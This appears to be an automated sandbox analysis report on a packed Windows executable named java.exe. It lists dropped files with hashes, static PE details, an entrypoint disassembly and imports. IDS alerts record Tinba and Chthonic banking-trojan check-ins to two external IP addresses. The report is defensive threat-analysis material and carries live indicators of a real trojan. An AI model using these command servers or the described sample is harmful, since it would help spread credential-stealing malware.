                                                                                                                                                                        Size (bytes):5
                                                                                                                                                                        Entropy (8bit):2.321928094887362
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Ay:Ay
                                                                                                                                                                        MD5:C204E9FAAF8565AD333828BEFF2D786E
                                                                                                                                                                        SHA1:7D23864F5E2A12C1A5F93B555D2D3E7C8F78EEC1
                                                                                                                                                                        SHA-256:D65B6A3BF11A27A1CED1F7E98082246E40CF01289FD47FE4A5ED46C221F2F73F
                                                                                                                                                                        SHA-512:E72F4F79A4AE2E5E40A41B322BC0408A6DEC282F90E01E0A8AAEDF9FB9D6F04A60F45A844595727539C1643328E9C1B989B90785271CC30A6550BBDA6B1909F8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:0.2..

                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c4e397f5-04d4-450a-abc7-0bb435a74ef7}\Apps.ft

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):50373
                                                                                                                                                                        Entropy (8bit):3.7533011813000954
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:2crkq/9PYdKNAd1d0f41H1Ii0OyAAZXjLdk6nMUisfhteVoVPPP8qoEYhk5+6DC3:2ckq/1YdKNAd1d0f41H1Ii5yAAZXHdep
                                                                                                                                                                        MD5:42C6CF763BC1DCEFD79C0E5262E7DFC4
                                                                                                                                                                        SHA1:2EAA3A2B1557ED78CA1166EB007608137E52C343
                                                                                                                                                                        SHA-256:99205F34B2E4960BE69575908CF5BC9C57A32A240105848EE998E1E79F240707
                                                                                                                                                                        SHA-512:73B48317D927329B24F59C164CEA53D0A8AF6456F8CD8F93A285286696626E15B1E2BE286A39310D4772A6263D6AB43710A07392B501324732FADBF8F50DB487
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:................h...."cmd"~........A%..*aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..d|(.e...f'..g*..h6..iq..j..AkG.l...m2..n~..o...p...q..Ar_.s...t>..u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........

                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{c4e397f5-04d4-450a-abc7-0bb435a74ef7}\Apps.index

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1126006
                                                                                                                                                                        Entropy (8bit):6.147114410359821
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:AoLr7YfoyFxz8GfoLr7YfoyFxz8G21it:AMwf1xz8GfMwf1xz8G2
                                                                                                                                                                        MD5:5665CA72FB1FE8FF993E1F56C8EDB387
                                                                                                                                                                        SHA1:11C371B293397DEE3289435CC6F797110D5A631B
                                                                                                                                                                        SHA-256:263D203F23A1E59D7FECA90148F7ED49333CD1CC607C58B4EEEDC1BF3A84F8C8
                                                                                                                                                                        SHA-512:5601C99D230FC811D192E23B4537048A86200532CE5A402749FCF687BBC23DF2E52CC3E8597E79E94A4E7CCF8945C825EA2A7EB93DD9A1F2204F28501E7FDBA1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CR*a..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.*Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...ter*et...ute.eute..luetjuey...st* ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue

                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133474217072615071.txt (copy)

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133474217072615071.txt.~tmp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):114941
                                                                                                                                                                        Entropy (8bit):5.179500563537803
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:zY/G8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ikB:GSzoz5D4x9N/riL1/gY
                                                                                                                                                                        MD5:ED10444C46BD13DBDCC387D36132F171
                                                                                                                                                                        SHA1:3E2D788FBFE3DD9472AE92F934A944343C9238F2
                                                                                                                                                                        SHA-256:2CC2137515CD3446BA3F92772D32D12969204A505AA85054F9514E4820D6A125
                                                                                                                                                                        SHA-512:0B938F00A53819C35B60B3F5CD15311D9D64F2A518E439EAB5091EDD492744A6115A97C98376C0254ACC91CE73328A4A2B0669BC6E9C4FFFA3A006EDF82AFBB5
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":6,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340807447259E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

                                                                                                                                                                        C:\Users\user\AppData\Roaming\E38A1E29\bin.exe

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\winver.exe
                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):116224
                                                                                                                                                                        Entropy (8bit):5.299499746289874
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:AiLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:AiyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                        MD5:CB95EC2B6EF058D45AA18CD146471002
                                                                                                                                                                        SHA1:0CB8175F51065046CD77E97C0E494AF09D4590F5
                                                                                                                                                                        SHA-256:05B0CFAE079AD7795B4FAACC8687078E4F42470F942E305559BB3DA027CBAD47
                                                                                                                                                                        SHA-512:3568358E90C56F13EC150BB0C08F0E2705721D21588AD78D1C38BCA4966009F4B873FE52D6FB001C788245AF0D1C365EDAE69F6DBEC3A326B92A511F0E6715CB
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L...(..T.............................Z............@.....................................................................................X...........................................................................................................UPX0....................................UPX1................................@....rsrc...............................@....imports............................@...........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                                                                                                                        Entropy (8bit):5.299512539602008
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                                                                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:java.exe
                                                                                                                                                                        File size:116'224 bytes
                                                                                                                                                                        MD5:0411c0706f66b49aa6bef1528606ee31
                                                                                                                                                                        SHA1:bdb8cb7a8aa380138ab9220075bb08b03a5edc28
                                                                                                                                                                        SHA256:9e6e9d8eabba4b886fa84170137e3a72c35cc7b360a5cba1a08cbc6b6f468a3c
                                                                                                                                                                        SHA512:3602a6a6503c363a1ff0185e3a8e5de51bfb58ebaf72903c141b68ea8d284553a2cd470439aab3af90a5bafec423845b37742a473055f12f0df2c8a0a4c1b53b
                                                                                                                                                                        SSDEEP:1536:jiLOvRmmQegJfBbmAQ256/ZrwWhwqjhurmKFcbL86WV0E:jiyvRmDLs/ZrwWjjAqGcfzWH
                                                                                                                                                                        TLSH:64B34B62F204E89BE817D8F29919CD3164A37DBC88A0455E32D97F6D58B3AD30859F0F
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}$...w...w...w..nw...w..~w...w..hw...w...w...w..}w...w..ow...w..kw...wRich...w........PE..L......T...........................

                                                                                                                                                                        File Icon

                                                                                                                                                                        Icon Hash:888c8e8eaa868fc6

                                                                                                                                                                        Static PE Info

                                                                                                                                                                        General

                                                                                                                                                                        Entrypoint:0x405a80
                                                                                                                                                                        Entrypoint Section:UPX0
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                        Subsystem:windows cui
                                                                                                                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                        DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x549217DD [Wed Dec 17 23:55:09 2014 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:4
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:d39aa71a62356d5bd05b3ccf2dfedd9e

                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                        Instruction
                                                                                                                                                                        push ebp
                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                        push ebx
                                                                                                                                                                        push esi
                                                                                                                                                                        sub esp, 38h
                                                                                                                                                                        mov dword ptr [ebp-10h], 00000000h
                                                                                                                                                                        mov eax, dword ptr [ebp-10h]
                                                                                                                                                                        mov dword ptr [ebp-2Ch], 00000001h
                                                                                                                                                                        mov ecx, dword ptr [ebp-2Ch]
                                                                                                                                                                        mov dword ptr [ebp-20h], 00000000h
                                                                                                                                                                        mov word ptr [ebp-22h], 2D5Bh
                                                                                                                                                                        mov edx, dword ptr [ebp-20h]
                                                                                                                                                                        mov dword ptr [ebp-28h], 00000007h
                                                                                                                                                                        mov esi, dword ptr [ebp-28h]
                                                                                                                                                                        mov byte ptr [ebp-2Dh], 00000052h
                                                                                                                                                                        mov bl, byte ptr [ebp-2Dh]
                                                                                                                                                                        mov word ptr [ebp-30h], 796Dh
                                                                                                                                                                        mov byte ptr [ebp-09h], bl
                                                                                                                                                                        mov eax, dword ptr [ebp+00h]
                                                                                                                                                                        mov dword ptr [0040DD44h], eax
                                                                                                                                                                        lea eax, dword ptr [ebp+04h]
                                                                                                                                                                        mov dword ptr [0040DD48h], eax
                                                                                                                                                                        mov dword ptr [esp], esi
                                                                                                                                                                        mov dword ptr [ebp-34h], eax
                                                                                                                                                                        mov dword ptr [ebp-38h], ecx
                                                                                                                                                                        mov dword ptr [ebp-3Ch], edx
                                                                                                                                                                        call 00007F6768E9602Eh
                                                                                                                                                                        mov ecx, dword ptr [ebp-3Ch]
                                                                                                                                                                        cmp eax, ecx
                                                                                                                                                                        je 00007F6768E9646Eh
                                                                                                                                                                        mov ax, 0000h
                                                                                                                                                                        mov cx, word ptr [ebp-30h]
                                                                                                                                                                        mov dx, ax
                                                                                                                                                                        sub dx, word ptr [ebp-30h]
                                                                                                                                                                        mov word ptr [ebp-30h], dx
                                                                                                                                                                        sub ax, word ptr [ebp-30h]
                                                                                                                                                                        or cx, 1256h
                                                                                                                                                                        mov word ptr [ebp-30h], cx
                                                                                                                                                                        mov word ptr [ebp-22h], ax
                                                                                                                                                                        mov esi, dword ptr [ebp-38h]
                                                                                                                                                                        mov dword ptr [ebp-14h], esi
                                                                                                                                                                        jmp 00007F6768E96454h
                                                                                                                                                                        mov ax, 0000h
                                                                                                                                                                        mov ecx, dword ptr [ebp-34h]
                                                                                                                                                                        mov dword ptr [ebp-14h], ecx
                                                                                                                                                                        sub ax, word ptr [ebp-22h]
                                                                                                                                                                        mov word ptr [ebp-22h], ax
                                                                                                                                                                        mov eax, dword ptr [ebp-14h]
                                                                                                                                                                        mov cx, word ptr [ebp-22h]
                                                                                                                                                                        and cx, 0673h
                                                                                                                                                                        mov word ptr [ebp-22h], cx
                                                                                                                                                                        add esp, 38h
                                                                                                                                                                        pop esi
                                                                                                                                                                        pop ebx
                                                                                                                                                                        pop ebp
                                                                                                                                                                        ret
                                                                                                                                                                        add byte ptr [eax], al

                                                                                                                                                                        Rich Headers

                                                                                                                                                                        Programming Language:
                                                                                                                                                                        • [ASM] VS2005 build 50727
                                                                                                                                                                        • [ C ] VS2005 build 50727
                                                                                                                                                                        • [IMP] VS2005 build 50727
                                                                                                                                                                        • [C++] VS2005 build 50727
                                                                                                                                                                        • [RES] VS2005 build 50727
                                                                                                                                                                        • [LNK] VS2005 build 50727

                                                                                                                                                                        Data Directories

                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1d0000x8c.imports
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000xd58.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                        Sections

                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        UPX00x10000x100000xf600False0.4557768038617886DOS executable (COM)4.895667733918766IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        UPX10x110000xb0000xb000False0.3611505681818182data5.633049275866229IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .rsrc0x1c0000x10000x1000False0.318359375data3.483060593097884IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .imports0x1d0000x10000xc00False0.421875data4.436376811230836IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                                                        Resources

                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_ICON0x1c2fc0x668Device independent bitmap graphic, 48 x 96 x 4, image size 00.21890243902439024
                                                                                                                                                                        RT_ICON0x118a00x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 00.3400537634408602
                                                                                                                                                                        RT_ICON0x11b980x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 00.35450819672131145
                                                                                                                                                                        RT_ICON0x11d900x128Device independent bitmap graphic, 16 x 32 x 4, image size 00.46283783783783783
                                                                                                                                                                        RT_ICON0x11ec80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.5026652452025586
                                                                                                                                                                        RT_ICON0x12d800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.5798736462093863
                                                                                                                                                                        RT_ICON0x136380x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.40264976958525345
                                                                                                                                                                        RT_ICON0x13d100x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.3273121387283237
                                                                                                                                                                        RT_ICON0x142880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.27344398340248965
                                                                                                                                                                        RT_ICON0x168400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.37875234521575984
                                                                                                                                                                        RT_ICON0x178f80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.37868852459016394
                                                                                                                                                                        RT_ICON0x182900x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.4796099290780142
                                                                                                                                                                        RT_GROUP_ICON0x1c9680xaedata0.5919540229885057
                                                                                                                                                                        RT_VERSION0x1ca1c0x33cdata0.47342995169082125

                                                                                                                                                                        Imports

                                                                                                                                                                        DLLImport
                                                                                                                                                                        GDI32.dllGetDeviceCaps
                                                                                                                                                                        KERNEL32.DLLAddAtomW, FreeConsole, GetCurrencyFormatW, IsProcessorFeaturePresent, CreateEventA, OpenFileMappingW, LocalHandle, HeapSize, MulDiv, WriteFile, GetTempFileNameW, SetLocaleInfoW, DosDateTimeToFileTime, EnumLanguageGroupLocalesW, CreatePipe, GetPrivateProfileSectionNamesA, SetConsoleTitleA, CancelDeviceWakeupRequest, GetVolumePathNameA, GetProfileIntA, GetDateFormatA, DebugBreak, SuspendThread, SetCommMask, EnumUILanguagesW, MoveFileWithProgressA, BackupRead, GetNumberOfConsoleInputEvents, GetLongPathNameA, FreeLibrary, GetFileAttributesW, EnumDateFormatsA, QueryDosDeviceA, UpdateResourceW, WritePrivateProfileStructA, lstrcpynA, GetExitCodeProcess, GlobalAddAtomW, GetShortPathNameW, UnlockFileEx, SetComputerNameExA, GetExitCodeProcess
                                                                                                                                                                        WINMM.dlltimeSetEvent, waveOutOpen, midiConnect, midiOutSetVolume, mmioOpenA, mmioWrite, DrvGetModuleHandle, mciGetDeviceIDFromElementIDW, waveOutGetErrorTextW, joyGetPosEx, mixerSetControlDetails, joySetThreshold, mmioRead, waveOutGetDevCapsA, DefDriverProc, mmioDescend, mixerGetLineInfoA, mciSendStringA, midiOutClose, midiInGetDevCapsW, midiStreamOut, mmioSetBuffer, midiInClose, waveOutReset, midiOutPrepareHeader, waveInGetPosition, GetDriverModuleHandle, mmioGetInfo, midiInMessage, mciGetCreatorTask, auxGetVolume, joyGetDevCapsW, waveInGetErrorTextA, mixerGetLineControlsW
                                                                                                                                                                        mscms.dllGetColorProfileElement, UninstallColorProfileA, AssociateColorProfileWithDeviceA, EnumColorProfilesW, GetStandardColorSpaceProfileW, DisassociateColorProfileFromDeviceW, GetStandardColorSpaceProfileA, SetStandardColorSpaceProfileW, DeleteColorTransform, GetPS2ColorRenderingIntent, SetColorProfileHeader, TranslateBitmapBits, CreateColorTransformA, ConvertIndexToColorName, CreateProfileFromLogColorSpaceW, RegisterCMMW, GetColorProfileElementTag, GetColorProfileFromHandle, UninstallColorProfileW, CreateMultiProfileTransform, GetCountColorProfileElements, InstallColorProfileA, CreateColorTransformW, CheckColors, SetColorProfileElementReference
                                                                                                                                                                        msvcrt.dlliswprint, _wgetenv, srand, strtok, iswupper, tolower, fputs, _swab, wcsncpy, _fputchar, iswctype, _strupr, bsearch, _strnicmp, memcmp, _wspawnl, _abnormal_termination, _rotl, _flsbuf, isdigit, memmove, _isctype, isalpha, isgraph, _wspawnvpe, _wexecve, _wcslwr, _wcsrev, fputwc, _fcvt, _ultoa, tmpnam, _wcreat
                                                                                                                                                                        ole32.dllOleCreateFromData, HWND_UserMarshal, CreateAntiMoniker, CoInitialize, CoSetProxyBlanket, CoDisconnectObject, ReleaseStgMedium, HGLOBAL_UserSize, PropStgNameToFmtId

                                                                                                                                                                        Network Behavior

                                                                                                                                                                        Snort IDS Alerts

                                                                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                        192.168.2.4104.131.68.18049736802020418 12/19/23-00:41:44.628603TCP2020418ET TROJAN Tinba Checkin 24973680192.168.2.4104.131.68.180
                                                                                                                                                                        192.168.2.4216.218.185.16249737802020418 12/19/23-00:41:46.120627TCP2020418ET TROJAN Tinba Checkin 24973780192.168.2.4216.218.185.162
                                                                                                                                                                        192.168.2.4104.131.68.18049736802830613 12/19/23-00:41:44.628603TCP2830613ETPRO TROJAN W32/Chthonic CnC Activity4973680192.168.2.4104.131.68.180
                                                                                                                                                                        192.168.2.4216.218.185.16249738802024659 12/19/23-00:41:47.666890TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973880192.168.2.4216.218.185.162
                                                                                                                                                                        192.168.2.4104.131.68.18049736802024659 12/19/23-00:41:44.628603TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973680192.168.2.4104.131.68.180
                                                                                                                                                                        192.168.2.4216.218.185.16249738802020418 12/19/23-00:41:47.666890TCP2020418ET TROJAN Tinba Checkin 24973880192.168.2.4216.218.185.162
                                                                                                                                                                        192.168.2.4216.218.185.16249735802020418 12/19/23-00:41:33.880543TCP2020418ET TROJAN Tinba Checkin 24973580192.168.2.4216.218.185.162
                                                                                                                                                                        192.168.2.4216.218.185.16249735802024659 12/19/23-00:41:33.880543TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973580192.168.2.4216.218.185.162
                                                                                                                                                                        192.168.2.4216.218.185.16249737802024659 12/19/23-00:41:46.120627TCP2024659ET TROJAN [PTsecurity] Tinba Checkin 44973780192.168.2.4216.218.185.162

                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                        TCP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 19, 2023 00:41:01.324368000 CET49675443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.189815044 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.191852093 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.191880941 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:23.192210913 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.202622890 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.202636003 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:23.496133089 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:23.589811087 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:23.589926004 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:24.105520964 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.057265043 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.057287931 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.057631016 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.057678938 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.058381081 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.058413982 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.076422930 CET49730443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.076436043 CET44349730173.222.162.32192.168.2.4
                                                                                                                                                                        Dec 19, 2023 00:41:25.308671951 CET49672443192.168.2.4173.222.162.32
                                                                                                                                                                        Dec 19, 2023 00:41:25.474803925 CET44349730173.222.162.32192.168.2.4
